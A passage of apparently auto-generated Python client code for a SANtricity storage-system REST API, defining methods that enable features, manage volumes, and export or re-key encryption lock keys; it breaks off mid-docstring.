NO EXPRESS OR IMPLIED LICENSES TO ANY PARTY'S PATENT RIGHTS ARE GRANTED BY THIS LICENSE. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
from __future__ import absolute_import
import sys
import os
# python 2 and python 3 compatibility library
from six import iteritems
from ....santricity.configuration import Configuration
from ....santricity.api_client import ApiClient
class EApi(object):
def __init__(self, api_client=None):
config = Configuration()
if api_client:
self.api_client = api_client
else:
if not config.api_client:
config.api_client = ApiClient(context_path='/devmgr/v2')
self.api_client = config.api_client
def symbol_enable_asup(self, system_id, **kwargs):
"""
This procedure is used to enable Autosupport.
Documented return codes: ok, notImplemented.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.symbol_enable_asup(system_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str system_id: The unique identifier of the storage-system. This may be the id or the WWN. (required)
:param str controller: Controller selection
:param bool verbose_error_response:
:return: str
If the method is called asynchronously,
returns the request thread.
:raises: ValueError
If the required params are not provided or if the response data format is unknown.
TypeError:
When the data type of response data is different from what we are expecting
ApiException:
Occurs when we get a HTTP error code (422 and above).
"""
all_params = ['system_id', 'controller', 'verbose_error_response']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method symbol_enable_asup" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'system_id' is set
if ('system_id' not in params) or (params['system_id'] is None):
raise ValueError("Missing the required parameter `system_id` when calling `symbol_enable_asup`")
resource_path = '/storage-systems/{system-id}/symbol/enableASUP'.replace('{format}', 'json')
path_params = {}
if 'system_id' in params:
path_params['system-id'] = params['system_id']
query_params = {}
if 'controller' in params:
query_params['controller'] = params['controller']
if 'verbose_error_response' in params:
query_params['verboseErrorResponse'] = params['verbose_error_response']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['basicAuth']
response = self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def symbol_enable_external_kms(self, system_id, body, **kwargs):
"""
Enables external KMS.
Documented return codes: ok, externalKmsEnabled, externalKmsFailed, externalKmsNotCompliant, externalKmsTimeout.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.symbol_enable_external_kms(system_id, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str system_id: The unique identifier of the storage-system. This may be the id or the WWN. (required)
:param str body: (required)
:param str controller: Controller selection
:param bool verbose_error_response:
:return: WrappedLockKeyReturn
If the method is called asynchronously,
returns the request thread.
:raises: ValueError
If the required params are not provided or if the response data format is unknown.
TypeError:
When the data type of response data is different from what we are expecting
ApiException:
Occurs when we get a HTTP error code (422 and above).
"""
all_params = ['system_id', 'body', 'controller', 'verbose_error_response']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method symbol_enable_external_kms" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'system_id' is set
if ('system_id' not in params) or (params['system_id'] is None):
raise ValueError("Missing the required parameter `system_id` when calling `symbol_enable_external_kms`")
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `symbol_enable_external_kms`")
resource_path = '/storage-systems/{system-id}/symbol/enableExternalKMS'.replace('{format}', 'json')
path_params = {}
if 'system_id' in params:
path_params['system-id'] = params['system_id']
query_params = {}
if 'controller' in params:
query_params['controller'] = params['controller']
if 'verbose_error_response' in params:
query_params['verboseErrorResponse'] = params['verbose_error_response']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['basicAuth']
response = self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='WrappedLockKeyReturn',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def symbol_enable_feature(self, system_id, body, **kwargs):
"""
This procedure causes the \"premium\" features identified in the feature keys of the argument to be enabled.
Documented return codes: ok, error, invalidSafeId, invalidSafeKey, invalidSafeCapability, invalidSafeVersion, perfTierSafeUpgradeDisabled, safeControllerNotSubjectToRaid6, premiumFeatureLimitExceedsMaximum, previouslyEnabledForEval, featureNotKeyable.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.symbol_enable_feature(system_id, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str system_id: The unique identifier of the storage-system. This may be the id or the WWN. (required)
:param FeatureKey body: A key for the \"premium\" feature to be enabled. This key must be obtained from an authorized source in order to be accepted by the array controller. (required)
:param str controller: Controller selection
:param bool verbose_error_response:
:return: str
If the method is called asynchronously,
returns the request thread.
:raises: ValueError
If the required params are not provided or if the response data format is unknown.
TypeError:
When the data type of response data is different from what we are expecting
ApiException:
Occurs when we get a HTTP error code (422 and above).
"""
all_params = ['system_id', 'body', 'controller', 'verbose_error_response']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method symbol_enable_feature" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'system_id' is set
if ('system_id' not in params) or (params['system_id'] is None):
raise ValueError("Missing the required parameter `system_id` when calling `symbol_enable_feature`")
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `symbol_enable_feature`")
resource_path = '/storage-systems/{system-id}/symbol/enableFeature'.replace('{format}', 'json')
path_params = {}
if 'system_id' in params:
path_params['system-id'] = params['system_id']
query_params = {}
if 'controller' in params:
query_params['controller'] = params['controller']
if 'verbose_error_response' in params:
query_params['verboseErrorResponse'] = params['verbose_error_response']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['basicAuth']
response = self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def symbol_enable_feature_evaluation(self, system_id, body, **kwargs):
"""
Used to start an evaluation of a specified feature using the duration specified for the sub-model ID in the FBDT.
Documented return codes: ok, noHeap, invalidSafeCapability, previouslyEnabledForEval, evalNotSupported, invalidCapability.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.symbol_enable_feature_evaluation(system_id, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str system_id: The unique identifier of the storage-system. This may be the id or the WWN. (required)
:param str body: (required)
:param str controller: Controller selection
:param bool verbose_error_response:
:return: str
If the method is called asynchronously,
returns the request thread.
:raises: ValueError
If the required params are not provided or if the response data format is unknown.
TypeError:
When the data type of response data is different from what we are expecting
ApiException:
Occurs when we get a HTTP error code (422 and above).
"""
all_params = ['system_id', 'body', 'controller', 'verbose_error_response']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method symbol_enable_feature_evaluation" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'system_id' is set
if ('system_id' not in params) or (params['system_id'] is None):
raise ValueError("Missing the required parameter `system_id` when calling `symbol_enable_feature_evaluation`")
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `symbol_enable_feature_evaluation`")
resource_path = '/storage-systems/{system-id}/symbol/enableFeatureEvaluation'.replace('{format}', 'json')
path_params = {}
if 'system_id' in params:
path_params['system-id'] = params['system_id']
query_params = {}
if 'controller' in params:
query_params['controller'] = params['controller']
if 'verbose_error_response' in params:
query_params['verboseErrorResponse'] = params['verbose_error_response']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['basicAuth']
response = self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def symbol_enable_flash_cache_volume(self, system_id, body, **kwargs):
"""
This procedure creates a flash cache proxy linked to the referenced user RAID Volume and the flash cache High Level Volume. The flash cache attribute on the RAID Volume will be turned on.
Documented return codes: ok, error, illegalParam, noHeap, volumeNotExist, volumeReconfiguring, tryAlternate, internalError, volumeFormatting, invalidVolumeref, volumeOffline, notFlashcacheVol, flashcacheDeleted, flashCacheInvalidBaseVol.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.symbol_enable_flash_cache_volume(system_id, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str system_id: The unique identifier of the storage-system. This may be the id or the WWN. (required)
:param VolumeFlashCacheDescriptor body: A reference to the user volume to link to the flash cache proxy, and a reference to the flash cache volume. (required)
:param str controller: Controller selection
:param bool verbose_error_response:
:return: str
If the method is called asynchronously,
returns the request thread.
:raises: ValueError
If the required params are not provided or if the response data format is unknown.
TypeError:
When the data type of response data is different from what we are expecting
ApiException:
Occurs when we get a HTTP error code (422 and above).
"""
all_params = ['system_id', 'body', 'controller', 'verbose_error_response']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method symbol_enable_flash_cache_volume" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'system_id' is set
if ('system_id' not in params) or (params['system_id'] is None):
raise ValueError("Missing the required parameter `system_id` when calling `symbol_enable_flash_cache_volume`")
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `symbol_enable_flash_cache_volume`")
resource_path = '/storage-systems/{system-id}/symbol/enableFlashCacheVolume'.replace('{format}', 'json')
path_params = {}
if 'system_id' in params:
path_params['system-id'] = params['system_id']
query_params = {}
if 'controller' in params:
query_params['controller'] = params['controller']
if 'verbose_error_response' in params:
query_params['verboseErrorResponse'] = params['verbose_error_response']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['basicAuth']
response = self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def symbol_establish_volume_copy(self, system_id, body, **kwargs):
"""
This procedure establishes a volume copy.
Documented return codes: ok, illegalParam, noHeap, tryAlternate, internalError, iconFailure, invalidCopyPriority, copyIncompatibleSource, copyIncompatibleTarget, copyGhostSource, copyGhostTarget, copyInvalidSourceRef, copyInvalidTargetRef, copyInvalidSourceState, copyInvalidTargetState, copySourceReconfig, copyTargetReconfig, copyTargetTooSmall, copyTargetLimit, maxVolumeCopysExceeded, copySourceReservation, copySourceFormat, copyTargetFormat, volcopyFeatureDisabled, copySourceZeroCapacity, copyApptagMismatch.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.symbol_establish_volume_copy(system_id, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str system_id: The unique identifier of the storage-system. This may be the id or the WWN. (required)
:param VolumeCopyCreationDescriptor body: The VolumeCopyCreationDescriptor for the volume copy. (required)
:param str controller: Controller selection
:param bool verbose_error_response:
:return: ReturnCodeWithRef
If the method is called asynchronously,
returns the request thread.
:raises: ValueError
If the required params are not provided or if the response data format is unknown.
TypeError:
When the data type of response data is different from what we are expecting
ApiException:
Occurs when we get a HTTP error code (422 and above).
"""
all_params = ['system_id', 'body', 'controller', 'verbose_error_response']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method symbol_establish_volume_copy" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'system_id' is set
if ('system_id' not in params) or (params['system_id'] is None):
raise ValueError("Missing the required parameter `system_id` when calling `symbol_establish_volume_copy`")
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `symbol_establish_volume_copy`")
resource_path = '/storage-systems/{system-id}/symbol/establishVolumeCopy'.replace('{format}', 'json')
path_params = {}
if 'system_id' in params:
path_params['system-id'] = params['system_id']
query_params = {}
if 'controller' in params:
query_params['controller'] = params['controller']
if 'verbose_error_response' in params:
query_params['verboseErrorResponse'] = params['verbose_error_response']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['basicAuth']
response = self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ReturnCodeWithRef',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def symbol_estimate_pit_rollback_repository_utilization(self, system_id, body, **kwargs):
"""
This procedure will return the amount of repository capacity necessary to perform a rollback operation.
Documented return codes: ok, invalidPitRef.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.symbol_estimate_pit_rollback_repository_utilization(system_id, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str system_id: The unique identifier of the storage-system. This may be the id or the WWN. (required)
:param str body: A reference to a PiT (required)
:param str controller: Controller selection
:param bool verbose_error_response:
:return: PITGroupRollbackUtilizationEstimateReturned
If the method is called asynchronously,
returns the request thread.
:raises: ValueError
If the required params are not provided or if the response data format is unknown.
TypeError:
When the data type of response data is different from what we are expecting
ApiException:
Occurs when we get a HTTP error code (422 and above).
"""
all_params = ['system_id', 'body', 'controller', 'verbose_error_response']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method symbol_estimate_pit_rollback_repository_utilization" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'system_id' is set
if ('system_id' not in params) or (params['system_id'] is None):
raise ValueError("Missing the required parameter `system_id` when calling `symbol_estimate_pit_rollback_repository_utilization`")
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `symbol_estimate_pit_rollback_repository_utilization`")
resource_path = '/storage-systems/{system-id}/symbol/estimatePITRollbackRepositoryUtilization'.replace('{format}', 'json')
path_params = {}
if 'system_id' in params:
path_params['system-id'] = params['system_id']
query_params = {}
if 'controller' in params:
query_params['controller'] = params['controller']
if 'verbose_error_response' in params:
query_params['verboseErrorResponse'] = params['verbose_error_response']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['basicAuth']
response = self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='PITGroupRollbackUtilizationEstimateReturned',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def symbol_expand_concat_volume(self, system_id, body, **kwargs):
"""
This procedure will expand a concatenated volume by adding another member RAID volume. Returns the ref for the new ConcatVolMember added.
Documented return codes: ok, invalidProtection, invalidConcatVolMemberLabel, concatVolMemberTooSmall, concatMemberLimitExceeded, invalidMemberVol, memberVolMapped, invalidMemberVolState, incompatibleMemberVol, concatVolumeFailed, cannotExpandConcatMember, repositoryFull, insufficientExpansionSpace, invalidExpansionSize, incompatibleRepositorySecurity.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.symbol_expand_concat_volume(system_id, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str system_id: The unique identifier of the storage-system. This may be the id or the WWN. (required)
:param ConcatVolumeExpansionDescriptor body: A descriptor of the concat volume to be expanded. (required)
:param str controller: Controller selection
:param bool verbose_error_response:
:return: ReturnCodeWithRef
If the method is called asynchronously,
returns the request thread.
:raises: ValueError
If the required params are not provided or if the response data format is unknown.
TypeError:
When the data type of response data is different from what we are expecting
ApiException:
Occurs when we get a HTTP error code (422 and above).
"""
all_params = ['system_id', 'body', 'controller', 'verbose_error_response']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method symbol_expand_concat_volume" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'system_id' is set
if ('system_id' not in params) or (params['system_id'] is None):
raise ValueError("Missing the required parameter `system_id` when calling `symbol_expand_concat_volume`")
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `symbol_expand_concat_volume`")
resource_path = '/storage-systems/{system-id}/symbol/expandConcatVolume'.replace('{format}', 'json')
path_params = {}
if 'system_id' in params:
path_params['system-id'] = params['system_id']
query_params = {}
if 'controller' in params:
query_params['controller'] = params['controller']
if 'verbose_error_response' in params:
query_params['verboseErrorResponse'] = params['verbose_error_response']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['basicAuth']
response = self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ReturnCodeWithRef',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def symbol_expand_thin_volume_virtual_capacity(self, system_id, body, **kwargs):
"""
This procedure will expand a thin volume's virtual capacity. It does not affect the repository volume's capacity.
Documented return codes: ok, error, illegalParam, noHeap, tryAlternate, internalError, invalidVolumeref, illegalVolume, invalidVirtualCapacity.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.symbol_expand_thin_volume_virtual_capacity(system_id, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str system_id: The unique identifier of the storage-system. This may be the id or the WWN. (required)
:param ThinVolumeExpansionDescriptor body: An object containing all of the attributes necessary to expand a thin volume's virtual capacity. (required)
:param str controller: Controller selection
:param bool verbose_error_response:
:return: str
If the method is called asynchronously,
returns the request thread.
:raises: ValueError
If the required params are not provided or if the response data format is unknown.
TypeError:
When the data type of response data is different from what we are expecting
ApiException:
Occurs when we get a HTTP error code (422 and above).
"""
all_params = ['system_id', 'body', 'controller', 'verbose_error_response']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method symbol_expand_thin_volume_virtual_capacity" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'system_id' is set
if ('system_id' not in params) or (params['system_id'] is None):
raise ValueError("Missing the required parameter `system_id` when calling `symbol_expand_thin_volume_virtual_capacity`")
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `symbol_expand_thin_volume_virtual_capacity`")
resource_path = '/storage-systems/{system-id}/symbol/expandThinVolumeVirtualCapacity'.replace('{format}', 'json')
path_params = {}
if 'system_id' in params:
path_params['system-id'] = params['system_id']
query_params = {}
if 'controller' in params:
query_params['controller'] = params['controller']
if 'verbose_error_response' in params:
query_params['verboseErrorResponse'] = params['verbose_error_response']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['basicAuth']
response = self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def symbol_export_lock_key(self, system_id, body, **kwargs):
"""
This procedure returns the WrappedLockKeyReturn union for the array.The WrappedLockKeyReturn contains the WrappedLockKey structure for the array it was exported from.
No return codes have been documented for this API!
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.symbol_export_lock_key(system_id, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str system_id: The unique identifier of the storage-system. This may be the id or the WWN. (required)
:param str body: The wrapped pass phrase used to encrypt the lock key. (required)
:param str controller: Controller selection
:param bool verbose_error_response:
:return: WrappedLockKeyReturn
If the method is called asynchronously,
returns the request thread.
:raises: ValueError
If the required params are not provided or if the response data format is unknown.
TypeError:
When the data type of response data is different from what we are expecting
ApiException:
Occurs when we get a HTTP error code (422 and above).
"""
all_params = ['system_id', 'body', 'controller', 'verbose_error_response']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method symbol_export_lock_key" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'system_id' is set
if ('system_id' not in params) or (params['system_id'] is None):
raise ValueError("Missing the required parameter `system_id` when calling `symbol_export_lock_key`")
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `symbol_export_lock_key`")
resource_path = '/storage-systems/{system-id}/symbol/exportLockKey'.replace('{format}', 'json')
path_params = {}
if 'system_id' in params:
path_params['system-id'] = params['system_id']
query_params = {}
if 'controller' in params:
query_params['controller'] = params['controller']
if 'verbose_error_response' in params:
query_params['verboseErrorResponse'] = params['verbose_error_response']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['basicAuth']
response = self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='WrappedLockKeyReturn',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def symbol_export_volume_group(self, system_id, body, **kwargs):
"""
This procedure places the identified volume group in an \"exported\" state so that its drives may be removed and installed into another array.
Documented return codes: ok, volumeGroupHasHotspare, volumeGroupReconfiguring, volumeGroupReconstructing, volumeGroupNotComplete, volumeGroupHasFailedDrives, volumeGroupHasNonOptimalVols, volumeGroupHasMirrorRelationship, volumeGroupHasVolcopyRelationship, volumeGroupHasMirroringMetadata, volumeGroupHasMappedVols, volumeGroupHasReservations, volumeGroupHasIncompatibleDacstores, volumeLimitExceeded, volumeGroupHasUnknownRaidLevel, volumeGroupHasUnsupportedRaidLevel, volumeGroupHasCloneOpportunity, volumeGroupHasInsufficientDrives, volumeGroupHasFailedVols, volumeGroupHasSnapshotRelationship, noNativeSstor, volumeInitializing, exportingDrivesDatabaseResynchronizing, exportingDrivesDatabaseFailed, volumeGroupHasArvmRelationship, volumeGroupHasPitgroupRelationship, volumeGroupHasPitviewRelationship, volumeGroupHasConcatRelationship.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.symbol_export_volume_group(system_id, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str system_id: The unique identifier of the storage-system. This may be the id or the WWN. (required)
:param str body: A SYMbol VolumeGroupRef identifying the volume group to export. (required)
:param str controller: Controller selection
:param bool verbose_error_response:
:return: str
If the method is called asynchronously,
returns the request thread.
:raises: ValueError
If the required params are not provided or if the response data format is unknown.
TypeError:
When the data type of response data is different from what we are expecting
ApiException:
Occurs when we get a HTTP error code (422 and above).
"""
all_params = ['system_id', 'body', 'controller', 'verbose_error_response']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method symbol_export_volume_group" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'system_id' is set
if ('system_id' not in params) or (params['system_id'] is None):
raise ValueError("Missing the required parameter `system_id` when calling `symbol_export_volume_group`")
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `symbol_export_volume_group`")
resource_path = '/storage-systems/{system-id}/symbol/exportVolumeGroup'.replace('{format}', 'json')
path_params = {}
if 'system_id' in params:
path_params['system-id'] = params['system_id']
query_params = {}
if 'controller' in params:
query_params['controller'] = params['controller']
if 'verbose_error_response' in params:
query_params['verboseErrorResponse'] = params['verbose_error_response']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['basicAuth']
response = self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def symbol_external_kms_re_key(self, system_id, body, **kwargs):
"""
Used to re-key the array with a new lock key.
Documented return codes: ok, externalKmsFailed, externalKmsNotEnabled, externalKmsNotCompliant, externalKmsTimeout.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.symbol_external_kms_re_key(system_id, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str system_id: The unique identifier of the storage-system. This may be the id or the WWN. (required)
:param str body: The wrapped pass phrase used to encrypt the lock key. (required)
:param str controller: Controller selection
:param bool verbose_error_response:
:return: WrappedLockKeyReturn
If the method is called asynchronously,
returns the request thread.
:raises: ValueError
If the required params are not provided or if the response data format is unknown.
TypeError:
